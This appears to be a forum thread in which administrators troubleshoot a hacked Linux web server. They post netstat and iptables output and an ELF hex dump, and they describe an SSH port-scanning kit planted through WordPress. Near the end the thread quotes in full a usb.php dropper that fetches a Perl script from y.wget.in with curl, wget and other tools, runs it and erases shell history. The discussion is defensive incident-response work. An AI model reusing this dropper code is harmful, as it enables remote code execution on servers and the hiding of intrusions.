/var/run/dovecot/auth-userdb unix 2 [ ACC ] STREAM LISTENING 10866 /var/run/dovecot/auth-master unix 2 [ ACC ] STREAM LISTENING 10868 /var/run/dovecot/auth-worker unix 2 [ ACC ] STREAM LISTENING 11536 /var/run/fail2ban/fail2ban.sock unix 2 [ ACC ] STREAM LISTENING 12245 /var/run/mod_fcgid/1801.0 unix 2 [ ACC ] STREAM LISTENING 5421548 /var/run/mod_fcgid/1801.9 unix 2 [ ACC ] STREAM LISTENING 12585 /var/run/mod_fcgid/1801.2 unix 2 [ ACC ] STREAM LISTENING 10719 /var/lib/mysql/mysql.sock I see several reverse IP's in there unknown to me. Does anybody know those?

The IP tables have the following settings:

iptables -A INPUT -p tcp --dport x000 -j ACCEPT #SSH
iptables -A INPUT -s xx.xx.xx.xx -j ACCEPT #Home
iptables -A INPUT -p icmp --icmp-type 8 -s 213.186.33.13 -j ACCEPT #Ping
iptables -A INPUT -p tcp --dport 443 -j ACCEPT #SSL
iptables -A INPUT -p tcp --dport 80 -j ACCEPT #http
iptables -A INPUT -p tcp --dport 995 -j ACCEPT #POP3 SSL
iptables -A INPUT -p tcp --dport 20050 -j ACCEPT #webmin
iptables -A INPUT -p tcp --dport 20051 -j ACCEPT #usermin
iptables -A INPUT -p tcp --dport 465 -j ACCEPT #SMTP SSL
iptables -A INPUT -p tcp --dport 53 -j ACCEPT #BIN
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -A OUTPUT -p tcp --dport 22 -j DROP #hack attempt
iptables -P OUTPUT ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

I have downloaded the b5.tar file and unpacked them with chmod 000.
Most files can be read and are deviced to create a netscan on port 22.
There are, however, 3 files I can’t read: ssh2, screen and pscan. They look something like this:

^?ELF^A^A^A^@^@^@^@^@^@^@^@^@^B^@^C^@^A^@^@^@^P<81>^D^H4^@^@^@´<8c>"^@^@^@^@^@4^@ ^@^E^@(^@’^@$^@^A^@^@^@^@^@^@^@^@<80>^D^H^@<80>^D^H<80>Ï^^@<80>Ï^^@^E^@^@^@^@^P^@^@^A^@^@^@^@Ð^^@^@P!^H^@P!^HD÷^@^@4<8d>^A^@^F^@^@^@^@^P^@^@^D^@^@^@Ô^@^@^@Ô<80>^D^HÔ<80>^D^H ^@^@^@ ^@^@^@^D^@^@^@^D^@^@^@^G^@^@^@^@Ð^^@^@P!^H^@P!^H^P^@^@^@0^@^@^@^D^@^@^@^D^@^@^@Qåtd^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^F^@^@^@^D^@^@^@^D^@^@^@^P^@^@^@^A^@^@^@GNU^@^@^@^@^@^B^@^@^@^F^@^@^@ ^@^@^@U<89>å<83>ì^Hè5^@^@^@èÌ^@^@^@è<87>^?^V^@ÉÃ^@^@^@^@^@1í^<89>á<83>äðPTRhà¼^T^Hh ½^T^HQVhú<85>^D^Hè_4^P^@ô<90><90>U<89>åS<83>ì^Dè^@^@^@^@[<81>Ã@&^]^@<8b><93>Üüÿÿ<85>Òt^Eèª~û÷X[ÉÃ<90><90><90><90><90><90>U<89>åS<83>ì^D<80>=dG"^H^@uT¸HP!^H-@P!^HÁø^B<8d>Xÿ¡G"^H9Ãv^_<8d>´&^@^@^@^@<83>À^A£G"^Hÿ^T<85>@P!^H¡`G"^H9Ãwè¸<80>ª^T^H<85>Àt^LÇ^D$Ü^Q^^^HèÃ(^P^@Æ^EdG"^H^A<83>Ä^D[]Ã<8d>¶^@^@^@

Is there any way how I can find out what they do without running them?

Now one of the sites has gone down again.
I am getting the following error:

Network Error (dns_server_failure)

Your request could not be processed because an error occurred contacting the DNS server.
The DNS server may be temporarily unavailable, or there could be a network problem.

For assistance, contact your network support team.

I have restarted the DNS server, but this has not helped.

I could not find the issue that caused the websites to become unavailable so I moved all websites to a new server.

Should anybody have any idea’s though, I am keeping the old server up and running for a little while longer so I can do some tests.

i had these files (named infi.php) in some folders besides public_html on one wordpress-site (V3.8) as well starting May, 11th.
as far as i understand shell-scripts, the script dns-pool from b5-directory scans for open ports 22 on several ip-adresses built dynamically and sends the result as scan.log (encoded perhaps) via ssh2 to an unknown server.
calls for the php-script infi.php have been made from host 37.151.26.6
i excluded the address for download the b5.tar-file and the address to ‘use’ infi.php as denied via tcp-wrapper.
I stopped some httpd instaces (with parameter ed and ted) signed as sync_supers
bandwidth monitoring anyway i logged tries to send tcp-packets to port 22.
they stopped.

May, 16th i was abel to watch somebody placing a file ‘usb.php’ in public_html. ma be to have a look for witeable directories via a downloaded perl-script read.txt from http://y.wget.in/. Short time later, this host has not been reachable any more, so i do not know the content of that file.

Chris,

Thanks for your reply.
I have had the USB file before. (contents below)
To stop the attacks from ever happening again on one of my servers I removed the website that allowed the upload of the php file.
I understand some CMS systems require unsafe settings of PHP.
Does anybody know more about how to secure a server which is running popular CMS systems like wordpress, drupal and joomla?

contents of usb.php

<? $url="http://y.wget.in/"; exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;'); exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @exec('cd /tmp;GET '.$url.'read.txt > read.txt;perl read.txt;rm -f read.txt*;'); @exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); @exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @passthru('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @passthru('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @passthru('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); @passthru('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @passthru('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @system('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @system('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @system('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @system('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); @system('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;curl -O '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;perl read.txt.txt;rm -f read.txt*;'); @shell_exec('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;rm -f read.txt*;'); @popen('cd /tmp;wget '.$url.'read.txt;perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;curl -O '.$url.'read.txt; perl read.txt;rm read.txt*;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;lwp-download '.$url.'read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;lynx -source '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;fetch '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); @popen('cd /tmp;GET '.$url.'read.txt >read.txt;perl read.txt;/usr/bin/perl read.txt;rm -f $HISTFILE', "r"); ?>